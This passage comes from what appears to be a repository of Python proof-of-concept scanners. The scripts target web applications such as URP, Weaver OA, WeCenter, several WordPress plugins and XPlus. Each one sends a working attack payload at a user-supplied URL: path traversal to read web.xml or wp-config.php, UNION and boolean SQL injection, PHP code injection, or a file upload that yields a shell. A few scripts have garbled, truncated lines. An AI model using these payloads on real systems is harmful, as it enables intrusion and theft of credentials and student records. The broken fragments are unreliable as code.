30 | req = requests.post(vulnurl, headers=headers, data=post_data, timeout=10, verify=False)
31 | if r'' in req.text:
32 | cprint("[+]存在umail sessionid登录漏洞...(中危)\tpayload: "+vulnurl+"\npost: "+json.dumps(post_data, indent=4), "yellow")
33 | else:
34 | cprint("[-]不存在umail_sessionid_access漏洞", "white", "on_grey")
35 |
36 | except:
37 | cprint("[-] "+__file__+"====>可能不存在漏洞", "cyan")
38 |
39 |
40 | if __name__ == "__main__":
41 | warnings.filterwarnings("ignore")
42 | testVuln = umail_sessionid_access_BaseVerify(sys.argv[1])
43 | testVuln.run()
--------------------------------------------------------------------------------
/pocs/urp/__init__.py:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/Binye234/What_Cms_Auto_Poc/56cae28bfecfe3032efe6578c3f571e5de21a3e9/pocs/urp/__init__.py
--------------------------------------------------------------------------------
/pocs/urp/urp_ReadJavaScriptServlet_fileread.py:
--------------------------------------------------------------------------------
1 | #!/usr/bin/env python
2 | # -*- coding: utf-8 -*-
3 | '''
4 | name: URP综合教务系统任意文件读取
5 | referer: http://www.wooyun.org/bugs/wooyun-2010-054350
6 | author: Lucifer
7 | description: 文件com.runqian.base.util.ReadJavaScriptServlet中,参数file存在任意文件读取。
8 | '''
9 | import sys
10 | import requests
11 | import warnings
12 | from termcolor import cprint
13 |
14 | class urp_ReadJavaScriptServlet_fileread_BaseVerify:
15 | def __init__(self, url):
16 | self.url = url
17 |
18 | def run(self):
19 | headers = {
20 | "User-Agent":"Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_6_8; en-us) AppleWebKit/534.50 (KHTML, like Gecko) Version/5.1 Safari/534.50"
21 | }
22 | payload = "/servlet/com.runqian.base.util.ReadJavaScriptServlet?file=../../../../../../WEB-INF/web.xml"
23 | vulnurl = self.url + payload
24 | try:
25 | req = requests.get(vulnurl, headers=headers, timeout=10, verify=False)
26 | if req.headers["Content-Type"] == "application/xml":
27 | cprint("[+]存在URP综合教务系统任意文件读取漏洞...(高危)\tpayload: "+vulnurl, "red")
28 | else:
29 | cprint("[-]不存在urp_ReadJavaScriptServlet漏洞", "white", "on_grey")
30 |
31 | except:
32 | cprint("[-] "+__file__+"====>可能不存在漏洞", "cyan")
33 |
34 | if __name__ == "__main__":
35 | warnings.filterwarnings("ignore")
36 | testVuln = urp_ReadJavaScriptServlet_fileread_BaseVerify(sys.argv[1])
37 | testVuln.run()
--------------------------------------------------------------------------------
/pocs/urp/urp_query.py:
--------------------------------------------------------------------------------
1 | #!/usr/bin/env python
2 | # -*- coding: utf-8 -*-
3 | '''
4 | name: urp查询接口曝露
5 | referer: http://www.wooyun.org/bugs/wooyun-2010-025424
6 | author: Lucifer
7 | description: urp查询接口未设置权限,可以越权查询任意学生信息,照片,成绩等
8 | '''
9 | import sys
10 | import requests
11 | import warnings
12 | from termcolor import cprint
13 |
14 | class urp_query_BaseVerify:
15 | def __init__(self, url):
16 | self.url = url
17 |
18 | def run(self):
19 | payload = "/reportFiles/cj/cj_zwcjd.jsp"
20 | vulnurl = self.url + payload
21 | try:
22 | req = requests.get(vulnurl, timeout=10, verify=False)
23 |
24 | if r"成绩单" in req.text:
25 | cprint("[+]存在urp查询接口曝露漏洞...(中危)\tpayload: "+vulnurl, "yellow")
26 | else:
27 | cprint("[-]不存在urp_query漏洞", "white", "on_grey")
28 |
29 | except:
30 | cprint("[-] "+__file__+"====>可能不存在漏洞", "cyan")
31 |
32 | if __name__ == "__main__":
33 | warnings.filterwarnings("ignore")
34 | testVuln = urp_query_BaseVerify(sys.argv[1])
35 | testVuln.run()
36 |
--------------------------------------------------------------------------------
/pocs/urp/urp_query2.py:
--------------------------------------------------------------------------------
1 | #!/usr/bin/env python
2 | # -*- coding: utf-8 -*-
3 | '''
4 | name: URP越权查看任意学生课表、成绩(需登录)
5 | referer: http://www.wooyun.org/bugs/wooyun-2010-099950
6 | author: Lucifer
7 | description: 系统存在一个越权漏洞,登录之后可以通过姓名或学号查看任意学生成绩和课表。
8 | '''
9 | import sys
10 | import requests
11 | import warnings
12 | from termcolor import cprint
13 |
14 | class urp_query2_BaseVerify:
15 | def __init__(self, url):
16 | self.url = url
17 |
18 | def run(self):
19 | payload = "/test1.jsp"
20 | vulnurl = self.url + payload
21 | try:
22 | req = requests.get(vulnurl, timeout=10, verify=False)
23 |
24 | if r"jmglAction.do" in req.text:
25 | cprint("[+]存在URP越权查看任意学生课表、成绩(需登录)漏洞...(中危)\tpayload: "+vulnurl, "yellow")
26 | else:
27 | cprint("[-]不存在urp_query2漏洞", "white", "on_grey")
28 |
29 | except:
30 | cprint("[-] "+__file__+"====>可能不存在漏洞", "cyan")
31 |
32 | if __name__ == "__main__":
33 | warnings.filterwarnings("ignore")
34 | testVuln = urp_query2_BaseVerify(sys.argv[1])
35 | testVuln.run()
36 |
--------------------------------------------------------------------------------
/pocs/weaver_oa/__init__.py:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/Binye234/What_Cms_Auto_Poc/56cae28bfecfe3032efe6578c3f571e5de21a3e9/pocs/weaver_oa/__init__.py
--------------------------------------------------------------------------------
/pocs/weaver_oa/weaver_oa_db_disclosure.py:
--------------------------------------------------------------------------------
1 | #!/usr/bin/env python
2 | # -*- coding: utf-8 -*-
3 | '''
4 | name: 泛微OA 数据库配置泄露
5 | referer: http://www.loner.fm/bugs/bug_detail.php?wybug_id=wooyun-2014-087500
6 | author: Lucifer
7 | description: mysql_config.ini泄露。
8 | '''
9 | import sys
10 | import requests
11 | import warnings
12 | from termcolor import cprint
13 |
14 | class weaver_oa_db_disclosure_BaseVerify:
15 | def __init__(self, url):
16 | self.url = url
17 |
18 | def run(self):
19 | headers = {
20 | "User-Agent":"Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_6_8; en-us) AppleWebKit/534.50 (KHTML, like Gecko) Version/5.1 Safari/534.50"
21 | }
22 | payload = "/mysql_config.ini"
23 | vulnurl = self.url + payload
24 |
25 | try:
26 | req = requests.get(vulnurl, headers=headers, timeout=10, verify=False)
27 | if r"datapassword" in req.text:
28 | cprint("[+]存在泛微OA 数据库配置泄露漏洞...(高危)\tpayload: "+vulnurl, "red")
29 | else:
30 | cprint("[-]不存在weaver_oa_db_disclosure漏洞", "white", "on_grey")
31 |
32 | except:
33 | cprint("[-] "+__file__+"====>可能不存在漏洞", "cyan")
34 |
35 | if __name__ == "__main__":
36 | warnings.filterwarnings("ignore")
37 | testVuln = weaver_oa_db_disclosure_BaseVerify(sys.argv[1])
38 | testVuln.run()
--------------------------------------------------------------------------------
/pocs/weaver_oa/weaver_oa_download_sqli.py:
--------------------------------------------------------------------------------
1 | #!/usr/bin/env python
2 | # -*- coding: utf-8 -*-
3 | '''
4 | name: 泛微OA filedownaction SQL注入
5 | referer: https://wooyun.shuimugan.com/bug/view?bug_no=76418
6 | author: Lucifer
7 | description: fileid参数引起的布尔盲注。
8 | '''
9 | import sys
10 | import requests
11 | import warnings
12 | from termcolor import cprint
13 |
14 | class weaver_oa_download_sqli_BaseVerify:
15 | def __init__(self, url):
16 | self.url = url
17 |
18 | def run(self):
19 | headers = {
20 | "User-Agent":"Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_6_8; en-us) AppleWebKit/534.50 (KHTML, like Gecko) Version/5.1 Safari/534.50"
21 | }
22 | true_url = r"/weaver/weaver.email.FileDownloadLocation?download=1&fileid=-1/**/Or/**/1=1"
23 | false_url = r"/weaver/weaver.email.FileDownloadLocation?download=1&fileid=-1/**/Or/**/1=2"
24 |
25 | try:
26 | req1 = requests.get(self.url+true_url, headers=headers, timeout=10, verify=False)
27 | req2 = requests.get(self.url+false_url, headers=headers, timeout=10, verify=False)
28 | if r"attachment" in str(req1.headers) and r"attachment" not in str(req2.headers):
29 | cprint("[+]存在泛微OA filedownaction SQL注入漏洞...(高危)\tpayload: "+self.url+true_url, "red")
30 | else:
31 | cprint("[-]不存在weaver_oa_download_sqli漏洞", "white", "on_grey")
32 |
33 | except:
34 | cprint("[-] "+__file__+"====>可能不存在漏洞", "cyan")
35 |
36 | if __name__ == "__main__":
37 | warnings.filterwarnings("ignore")
38 | testVuln = weaver_oa_download_sqli_BaseVerify(sys.argv[1])
39 | testVuln.run()
--------------------------------------------------------------------------------
/pocs/weaver_oa/weaver_oa_filedownload.py:
--------------------------------------------------------------------------------
1 | #!/usr/bin/env python
2 | # -*- coding: utf-8 -*-
3 | '''
4 | name: 泛微OA downfile.php 任意文件下载漏洞
5 | referer:
6 | author: Lucifer
7 | description: fileid参数引起的布尔盲注。
8 | '''
9 | import re
10 | import sys
11 | import requests
12 | import warnings
13 | from termcolor import cprint
14 |
15 | class weaver_oa_filedownload_BaseVerify:
16 | def __init__(self, url):
17 | self.url = url
18 |
19 | def run(self):
20 | headers = {
21 | "User-Agent":"Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_6_8; en-us) AppleWebKit/534.50 (KHTML, like Gecko) Version/5.1 Safari/534.50"
22 | }
23 | payload = "/E-mobile/Data/downfile.php?url=123"
24 | vulnurl = self.url + payload
25 | try:
26 | req = requests.get(self.url, headers=headers, timeout=10, verify=False)
27 | if req.status_code == 200:
28 | m = re.search(r'No error in ([^<]+)', req.text)
29 | if m:
30 | cprint("[+]存在泛微OA downfile.php 任意文件下载漏洞...(高危)\tpayload: "+self.url, "red")
31 | else:
32 | cprint("[-]不存在weaver_oa_filedownload漏洞", "white", "on_grey")
33 |
34 | except:
35 | cprint("[-] "+__file__+"====>可能不存在漏洞", "cyan")
36 |
37 | if __name__ == "__main__":
38 | warnings.filterwarnings("ignore")
39 | testVuln = weaver_oa_filedownload_BaseVerify(sys.argv[1])
40 | testVuln.run()
--------------------------------------------------------------------------------
/pocs/wecenter/__init__.py:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/Binye234/What_Cms_Auto_Poc/56cae28bfecfe3032efe6578c3f571e5de21a3e9/pocs/wecenter/__init__.py
--------------------------------------------------------------------------------
/pocs/wecenter/wecenter_topic_id_sqli.py:
--------------------------------------------------------------------------------
1 | #!/usr/bin/env python
2 | # -*- coding: utf-8 -*-
3 | '''
4 | name: wecenter SQL注入
5 | referer: http://www.wooyun.org/bugs/wooyun-2010-0106369
6 | author: Lucifer
7 | description: 文件explore/UPLOAD/?/topic/ajax/question_list中,参数topic_id存在SQL注入。
8 | '''
9 | import sys
10 | import requests
11 | import warnings
12 | from termcolor import cprint
13 |
14 | class wecenter_topic_id_sqli_BaseVerify:
15 | def __init__(self, url):
16 | self.url = url
17 |
18 | def run(self):
19 | headers = {
20 | "User-Agent":"Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_6_8; en-us) AppleWebKit/534.50 (KHTML, like Gecko) Version/5.1 Safari/534.50"
21 | }
22 | payload = "/explore/UPLOAD/?/topic/ajax/question_list/type-best&topic_id=1%29UnIoN/**/SeLeCt/**/Md5(1234)%23"
23 | vulnurl = self.url + payload
24 | try:
25 | req = requests.get(vulnurl, headers=headers, timeout=10, verify=False)
26 | if r"81dc9bdb52d04dc20036dbd8313ed055" in req.text:
27 | cprint("[+]存在wecenter SQL注入漏洞...(高危)\tpayload: "+vulnurl, "red")
28 | else:
29 | cprint("[-]不存在wecenter_topic_id_sqli漏洞", "white", "on_grey")
30 |
31 | except:
32 | cprint("[-] "+__file__+"====>可能不存在漏洞", "cyan")
33 |
34 | if __name__ == "__main__":
35 | warnings.filterwarnings("ignore")
36 | testVuln = wecenter_topic_id_sqli_BaseVerify(sys.argv[1])
37 | testVuln.run()
--------------------------------------------------------------------------------
/pocs/wordpress/__init__.py:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/Binye234/What_Cms_Auto_Poc/56cae28bfecfe3032efe6578c3f571e5de21a3e9/pocs/wordpress/__init__.py
--------------------------------------------------------------------------------
/pocs/wordpress/wordpress_admin_ajax_filedownload.py:
--------------------------------------------------------------------------------
1 | #!/usr/bin/env python
2 | # -*- coding: utf-8 -*-
3 | '''
4 | name: wordpress admin-ajax.php任意文件下载
5 | referer: unknown
6 | author: Lucifer
7 | description: 文件admin-ajax.php中,参数img存在任意文件下载漏洞。
8 | '''
9 | import sys
10 | import requests
11 | import warnings
12 | from termcolor import cprint
13 |
14 | class wordpress_admin_ajax_filedownload_BaseVerify:
15 | def __init__(self, url):
16 | self.url = url
17 |
18 | def run(self):
19 | headers = {
20 | "User-Agent":"Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_6_8; en-us) AppleWebKit/534.50 (KHTML, like Gecko) Version/5.1 Safari/534.50"
21 | }
22 | payload = "/wp-admin/admin-ajax.php?action=revslider_show_image&img=../wp-config.php"
23 | vulnurl = self.url + payload
24 | try:
25 | req = requests.get(vulnurl, headers=headers, timeout=10, verify=False)
26 | if r"DB_NAME" in req.text and r"DB_USER" in req.text:
27 | cprint("[+]存在wordpress admin-ajax.php任意文件下载漏洞...(高危)\tpayload: "+vulnurl, "red")
28 | else:
29 | cprint("[-]不存在wordpress_admin_ajax_filedownload漏洞", "white", "on_grey")
30 |
31 | except:
32 | cprint("[-] "+__file__+"====>可能不存在漏洞", "cyan")
33 |
34 | if __name__ == "__main__":
35 | warnings.filterwarnings("ignore")
36 | testVuln = wordpress_admin_ajax_filedownload_BaseVerify(sys.argv[1])
37 | testVuln.run()
--------------------------------------------------------------------------------
/pocs/wordpress/wordpress_display_widgets_backdoor.py:
--------------------------------------------------------------------------------
1 | #!/usr/bin/env python
2 | # -*- coding: utf-8 -*-
3 | '''
4 | name: wordpress display-widgets插件后门漏洞
5 | referer: http://www.nsfocus.com.cn/upload/contents/2017/09/20170915174457_73771.pdf
6 | author: Lucifer
7 | description: wordpress display-widgets Version 2.6.1——Version 2.6.3.1 geolocation.php存在后门。
8 | '''
9 | import sys
10 | import requests
11 | import warnings
12 | from termcolor import cprint
13 |
14 | class wordpress_display_widgets_backdoor_BaseVerify:
15 | def __init__(self, url):
16 | self.url = url
17 |
18 | def run(self):
19 | headers = {
20 | "User-Agent":"Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_6_8; en-us) AppleWebKit/534.50 (KHTML, like Gecko) Version/5.1 Safari/534.50"
21 | }
22 | payload = "/wp-content/plugins/display-widgets/geolocation.php"
23 | vulnurl = self.url + payload
24 | try:
25 | req = requests.get(vulnurl, headers=headers, timeout=10, verify=False, allow_redirects=False)
26 | if req.status_code == 200:
27 | cprint("[+]存在wordpress display-widgets插件后门漏洞...(高危)\tpayload: "+vulnurl, "red")
28 | else:
29 | cprint("[-]不存在wordpress_display_widgets_backdoor漏洞", "white", "on_grey")
30 |
31 | except:
32 | cprint("[-] "+__file__+"====>可能不存在漏洞", "cyan")
33 |
34 | if __name__ == "__main__":
35 | warnings.filterwarnings("ignore")
36 | testVuln = wordpress_display_widgets_backdoor_BaseVerify(sys.argv[1])
37 | testVuln.run()
38 |
--------------------------------------------------------------------------------
/pocs/wordpress/wordpress_plugin_ShortCode_lfi.py:
--------------------------------------------------------------------------------
1 | #!/usr/bin/env python
2 | # -*- coding: utf-8 -*-
3 | '''
4 | name: wordpress 插件shortcode0.2.3 本地文件包含
5 | referer: https://www.exploit-db.com/exploits/34436
6 | author: Lucifer
7 | description: 文件force-download.php参数file未过滤存在文件包含漏洞。
8 | '''
9 | import sys
10 | import requests
11 | import warnings
12 | from termcolor import cprint
13 |
14 | class wordpress_plugin_ShortCode_lfi_BaseVerify:
15 | def __init__(self, url):
16 | self.url = url
17 |
18 | def run(self):
19 | headers = {
20 | "User-Agent":"Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_6_8; en-us) AppleWebKit/534.50 (KHTML, like Gecko) Version/5.1 Safari/534.50"
21 | }
22 | payloads = ["/force-download.php?file=force-download.php",
23 | "/wp/wp-content/force-download.php?file=force-download.php",
24 | "/wp-content/force-download.php?file=force-download.php",
25 | "/wp-content/themes/ucin/includes/force-download.php?file=force-download.php",
26 | "/wp-content/uploads/patientforms/force-download.php?file=force-download.php"]
27 | try:
28 | for payload in payloads:
29 | vulnurl = self.url + payload
30 | req = requests.get(vulnurl, headers=headers, timeout=5, verify=False)
31 | if r"可能不存在漏洞", "cyan")
38 |
39 | if __name__ == "__main__":
40 | warnings.filterwarnings("ignore")
41 | testVuln = wordpress_plugin_ShortCode_lfi_BaseVerify(sys.argv[1])
42 | testVuln.run()
--------------------------------------------------------------------------------
/pocs/wordpress/wordpress_plugin_azonpop_sqli.py:
--------------------------------------------------------------------------------
1 | #!/usr/bin/env python
2 | # -*- coding: utf-8 -*-
3 | '''
4 | name: Wordpress AzonPop插件SQL注入
5 | referer: https://cxsecurity.com/issue/WLB-2016010049
6 | author: Lucifer
7 | description: payload:/wp-content/plugins/AzonPop/files/view/showpopup.php?popid=null /*!00000union*/ select 1,2,/*!00000gRoup_ConCat(unhex(hex(user_login)),0x3c2f62723e,unhex(hex(user_pass)))*/,4,5 /*!00000from*/ wp_users
8 | '''
9 | import sys
10 | import requests
11 | import warnings
12 | from termcolor import cprint
13 |
14 | class wordpress_plugin_azonpop_sqli_BaseVerify:
15 | def __init__(self, url):
16 | self.url = url
17 |
18 | def run(self):
19 | headers = {
20 | "User-Agent":"Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_6_8; en-us) AppleWebKit/534.50 (KHTML, like Gecko) Version/5.1 Safari/534.50"
21 | }
22 | payload = "/wp-content/plugins/AzonPop/files/view/showpopup.php?popid=null%20/*!00000union*/%20select%201,2,/*!00000gRoup_ConCat(unhex(hex(Md5(1234))),0x3c2f62723e,unhex(hex(Md5(1234))))*/,4,5%20/*!00000from*/%20wp_users"
23 | vulnurl = self.url + payload
24 | try:
25 | req = requests.get(vulnurl, headers=headers, timeout=10, verify=False)
26 | if r"81dc9bdb52d04dc20036dbd8313ed055" in req.text:
27 | cprint("[+]存在Wordpress AzonPop插件SQL注入漏洞...(高危)\tpayload: "+vulnurl, "red")
28 | else:
29 | cprint("[-]不存在wordpress_plugin_azonpop_sqli漏洞", "white", "on_grey")
30 |
31 | except:
32 | cprint("[-] "+__file__+"====>可能不存在漏洞", "cyan")
33 |
34 | if __name__ == "__main__":
35 | warnings.filterwarnings("ignore")
36 | testVuln = wordpress_plugin_azonpop_sqli_BaseVerify(sys.argv[1])
37 | testVuln.run()
38 |
--------------------------------------------------------------------------------
/pocs/wordpress/wordpress_plugin_mailpress_rce.py:
--------------------------------------------------------------------------------
1 | #!/usr/bin/env python
2 | # -*- coding: utf-8 -*-
3 | '''
4 | name: wordpress 插件mailpress远程代码执行
5 | referer: http://0day5.com/archives/3960
6 | author: Lucifer
7 | description: Mailpress存在越权调用,在不登陆的情况下,可以调用系统某些方法,造成远程命令执行。
8 | '''
9 | import re
10 | import sys
11 | import json
12 | import requests
13 | import warnings
14 | from termcolor import cprint
15 |
16 | class wordpress_plugin_mailpress_rce_BaseVerify:
17 | def __init__(self, url):
18 | self.url = url
19 |
20 | def run(self):
21 | headers = {
22 | "User-Agent":"Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_6_8; en-us) AppleWebKit/534.50 (KHTML, like Gecko) Version/5.1 Safari/534.50"
23 | }
24 | payload = "/wp-content/plugins/mailpress/mp-includes/action.php"
25 | vulnurl = self.url + payload
26 | post_data = {
27 | "action":"autosave",
28 | "id":0,
29 | "revision":-1,
30 | "toemail":"",
31 | "toname":"",
32 | "fromemail":"",
33 | "fromname":"",
34 | "to_list":1,
35 | "Theme":"",
36 | "subject":"",
37 | "html":"",
38 | "plaintext":"",
39 | "mail_format":"standard",
40 | "autosave":1,
41 | }
42 | try:
43 | req = requests.post(vulnurl, data=post_data, headers=headers, timeout=10, verify=False)
44 | start = req.text.find("可能不存在漏洞", "cyan")
57 |
58 | if __name__ == "__main__":
59 | warnings.filterwarnings("ignore")
60 | testVuln = wordpress_plugin_mailpress_rce_BaseVerify(sys.argv[1])
61 | testVuln.run()
--------------------------------------------------------------------------------
/pocs/wordpress/wordpress_restapi_sqli.py:
--------------------------------------------------------------------------------
1 | #!/usr/bin/env python
2 | # -*- coding: utf-8 -*-
3 | '''
4 | name: wordpress rest api权限失效导致内容注入
5 | referer: https://www.t00ls.net/thread-38046-1-1.html
6 | author: Lucifer
7 | description: 篡改文章权限。
8 | '''
9 | import sys
10 | import json
11 | import requests
12 | import warnings
13 | from termcolor import cprint
14 |
15 | class wordpress_restapi_sqli_BaseVerify:
16 | def __init__(self, url):
17 | self.url = url
18 |
19 | def run(self):
20 | headers = {
21 | "User-Agent":"Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_6_8; en-us) AppleWebKit/534.50 (KHTML, like Gecko) Version/5.1 Safari/534.50"
22 | }
23 | headers2 = {
24 | "User-Agent":"Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_6_8; en-us) AppleWebKit/534.50 (KHTML, like Gecko) Version/5.1 Safari/534.50",
25 | "Content-Type":"application/json"
26 | }
27 | payload = "/index.php/wp-json/wp/v2/posts"
28 | vulnurl = self.url + payload
29 | try:
30 | req = requests.get(vulnurl, headers=headers, timeout=10, verify=False)
31 | d = json.loads(req.text)
32 | id_code = d[0]['id']
33 | vulnurl = self.url + "/index.php/wp-json/wp/v2/posts/"+str(id_code)+"?id="+str(id_code)+"a"
34 | post_data = {
35 | "title":"81dc9bdb52d04dc20036dbd8313ed055"
36 | }
37 | req = requests.post(vulnurl, data=json.dumps(post_data), headers=headers2, timeout=10, verify=False)
38 | d = json.loads(req.text)
39 | status = d['data']['status']
40 | if status != 401 and status != 400:
41 | cprint("[+]存在wordpress rest api权限失效导致内容注入漏洞...(高危)\tpayload: "+vulnurl, "red")
42 |
43 | else:
44 | cprint("[-]不存在wordpress_restapi_sqli漏洞", "white", "on_grey")
45 |
46 | except:
47 | cprint("[-] "+__file__+"====>可能不存在漏洞", "cyan")
48 |
49 | if __name__ == "__main__":
50 | warnings.filterwarnings("ignore")
51 | testVuln = wordpress_restapi_sqli_BaseVerify(sys.argv[1])
52 | testVuln.run()
53 |
--------------------------------------------------------------------------------
/pocs/wordpress/wordpress_url_redirect.py:
--------------------------------------------------------------------------------
1 | #!/usr/bin/env python
2 | # -*- coding: utf-8 -*-
3 | '''
4 | name: wordpress插件跳转
5 | referer: unknown
6 | author: Lucifer
7 | description: feed-statistics.php中参数url未经过验证可跳转任意网站。
8 | '''
9 | import sys
10 | import requests
11 | import warnings
12 | from termcolor import cprint
13 |
14 | class wordpress_url_redirect_BaseVerify:
15 | def __init__(self, url):
16 | self.url = url
17 |
18 | def run(self):
19 | headers = {
20 | "User-Agent":"Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_6_8; en-us) AppleWebKit/534.50 (KHTML, like Gecko) Version/5.1 Safari/534.50"
21 | }
22 | payload = "/wp-content/plugins/wordpress-feed-statistics/feed-statistics.php?url=aHR0cDovLzQ1Ljc2LjE1OC45MS9zc3Jm"
23 | vulnurl = self.url + payload
24 | try:
25 | req = requests.get(vulnurl, headers=headers, timeout=10, verify=False)
26 | if r"100e8a82eea1ef8416e585433fd8462e" in req.text:
27 | cprint("[+]存在wordpress插件跳转漏洞...(低危)\tpayload: "+vulnurl, "blue")
28 | else:
29 | cprint("[-]不存在wordpress_url_redirect漏洞", "white", "on_grey")
30 |
31 | except:
32 | cprint("[-] "+__file__+"====>可能不存在漏洞", "cyan")
33 |
34 | if __name__ == "__main__":
35 | warnings.filterwarnings("ignore")
36 | testVuln = wordpress_url_redirect_BaseVerify(sys.argv[1])
37 | testVuln.run()
38 |
--------------------------------------------------------------------------------
/pocs/wordpress/wordpress_woocommerce_code_exec.py:
--------------------------------------------------------------------------------
1 | #!/usr/bin/env python
2 | # -*- coding: utf-8 -*-
3 | '''
4 | name: wordpress 插件WooCommerce PHP代码注入
5 | referer: https://packetstormsecurity.com/files/135000/WordPress-WooCommerce-2.4.12-PHP-Code-Injection.html
6 | author: Lucifer
7 | description: 插件WooCommerce中,参数items_per_page存在PHP代码注入。
8 | '''
9 | import sys
10 | import requests
11 | import warnings
12 | from termcolor import cprint
13 |
14 | class wordpress_woocommerce_code_exec_BaseVerify:
15 | def __init__(self, url):
16 | self.url = url
17 |
18 | def run(self):
19 | headers = {
20 | "User-Agent":"Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_6_8; en-us) AppleWebKit/534.50 (KHTML, like Gecko) Version/5.1 Safari/534.50"
21 | }
22 | payload = "/produits/?items_per_page=%24%7b%40print(md5(1234))%7d&setListingType=grid"
23 | vulnurl = self.url + payload
24 | try:
25 | req = requests.get(vulnurl, headers=headers, timeout=10, verify=False)
26 | if r"81dc9bdb52d04dc20036dbd8313ed055" in req.text:
27 | cprint("[+]存在wordpress 插件WooCommerce PHP代码注入漏洞...(高危)\tpayload: "+vulnurl, "red")
28 | else:
29 | cprint("[-]不存在wordpress_woocommerce_code_exec漏洞", "white", "on_grey")
30 |
31 | except:
32 | cprint("[-] "+__file__+"====>可能不存在漏洞", "cyan")
33 |
34 | if __name__ == "__main__":
35 | warnings.filterwarnings("ignore")
36 | testVuln = wordpress_woocommerce_code_exec_BaseVerify(sys.argv[1])
37 | testVuln.run()
--------------------------------------------------------------------------------
/pocs/xplus/__init__.py:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/Binye234/What_Cms_Auto_Poc/56cae28bfecfe3032efe6578c3f571e5de21a3e9/pocs/xplus/__init__.py
--------------------------------------------------------------------------------
/pocs/xplus/xplus_2003_getshell.py:
--------------------------------------------------------------------------------
1 | #!/usr/bin/env python
2 | # -*- coding: utf-8 -*-
3 | '''
4 | name: xplus npmaker 2003系统GETSHELL
5 | referer: http://www.hackdig.com/?07/hack-5007.htm
6 | author: Lucifer
7 | description: 文件/news/js.php中,参数f_id存在SQL注入。
8 | '''
9 | import sys
10 | import json
11 | import requests
12 | import warnings
13 | from termcolor import cprint
14 |
15 | class xplus_2003_getshell_BaseVerify:
16 | def __init__(self, url):
17 | self.url = url
18 |
19 | def run(self):
20 | headers = {
21 | "User-Agent":"Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_6_8; en-us) AppleWebKit/534.50 (KHTML, like Gecko) Version/5.1 Safari/534.50"
22 | }
23 | post_data = {
24 | "onepage[name]":"81dc9bdb52d04dc20036dbd8313ed055",
25 | "onepage[filename]":"php.php;",
26 | "onepage[content]":"",
27 | "id":"",
28 | "onepage_submit":"%CC%E1%BD%BB"
29 | }
30 | payload = "/www/index.php?mod=admin&con=onepage&act=addpost"
31 | vulnurl = self.url + payload
32 | try:
33 | req = requests.post(vulnurl, data=post_data, headers=headers, timeout=10, verify=False)
34 | verifyurl = self.url + "/shtml/php.php;.shtml"
35 | req2 = requests.get(verifyurl, headers=headers, timeout=10, verify=False)
36 | if req2.status_code == 200 and r"81dc9bdb52d04dc20036dbd8313ed055" in req2.text:
37 | cprint("[+]存在xplus npmaker 2003系统GETSHELL漏洞...(高危)\tpayload: "+vulnurl+"\npost: "+json.dumps(post_data, indent=4), "red")
38 | else:
39 | cprint("[-]不存在xplus_2003_getshell漏洞", "white", "on_grey")
40 |
41 | except:
42 | cprint("[-] "+__file__+"====>可能不存在漏洞", "cyan")
43 |
44 | if __name__ == "__main__":
45 | warnings.filterwarnings("ignore")
46 | testVuln = xplus_2003_getshell_BaseVerify(sys.argv[1])
47 | testVuln.run()
--------------------------------------------------------------------------------
/pocs/xplus/xplus_mysql_mssql_sqli.py:
--------------------------------------------------------------------------------
1 | #!/usr/bin/env python
2 | # -*- coding: utf-8 -*-
3 | '''
4 | name: xplus通用注入
5 | referer: http://www.hackdig.com/?07/hack-5007.htm
6 | author: Lucifer
7 | description: 对mysql和mssql注入点不同。
8 | '''
9 | import sys
10 | import requests
11 | import warnings
12 | from termcolor import cprint
13 |
14 | class xplus_mysql_mssql_sqli_BaseVerify:
15 | def __init__(self, url):
16 | self.url = url
17 |
18 | def run(self):
19 | headers = {
20 | "User-Agent":"Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_6_8; en-us) AppleWebKit/534.50 (KHTML, like Gecko) Version/5.1 Safari/534.50"
21 | }
22 | payload = "/www/index.php?mod=admin&con=deliver&act=view&username=809763517&deliId=-32%20UnIoN%20SeLeCt%201,Md5(1234),3,4,5,6,7,8,9,10,11,12,13--"
23 | vulnurl = self.url + payload
24 | try:
25 | req = requests.get(vulnurl, headers=headers, timeout=10, verify=False)
26 | if r"81dc9bdb52d04dc20036dbd8313ed055" in req.text:
27 | cprint("[+]存在xplus MYSQL通用注入漏洞...(高危)\tpayload: "+vulnurl, "red")
28 | else:
29 | cprint("[-]不存在xplus_mysql_mssql_sqli漏洞", "white", "on_grey")
30 |
31 | payload = "/www/index.php?mod=index&con=Review&act=getallpaper&papertype=scrb%27AnD%20ChAr(71)%252BChAr(65)%252BChAr(79)%252BChAr(74)%252BChAr(73)%252B@@VeRsIon%3E0--"
32 | req = requests.get(vulnurl, headers=headers, timeout=10, verify=False)
33 | if r"GAOJIMicrosoft" in req.text:
34 | cprint("[+]存在xplus MSSQL通用注入漏洞...(高危)\tpayload: "+vulnurl, "red")
35 | else:
36 | cprint("[-]不存在xplus_mysql_mssql_sqli漏洞", "white", "on_grey")
37 |
38 | except:
39 | cprint("[-] "+__file__+"====>可能不存在漏洞", "cyan")
40 |
41 | if __name__ == "__main__":
42 | warnings.filterwarnings("ignore")
43 | testVuln = xplus_mysql_mssql_sqli_BaseVerify(sys.argv[1])
44 | testVuln.run()
--------------------------------------------------------------------------------
/pocs/zfsoft/__init__.py:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/Binye234/What_Cms_Auto_Poc/56cae28bfecfe3032efe6578c3f571e5de21a3e9/pocs/zfsoft/__init__.py
--------------------------------------------------------------------------------
/pocs/zfsoft/xml/zfsoft_service_stryhm_sqli_false.xml:
--------------------------------------------------------------------------------
1 |
2 |
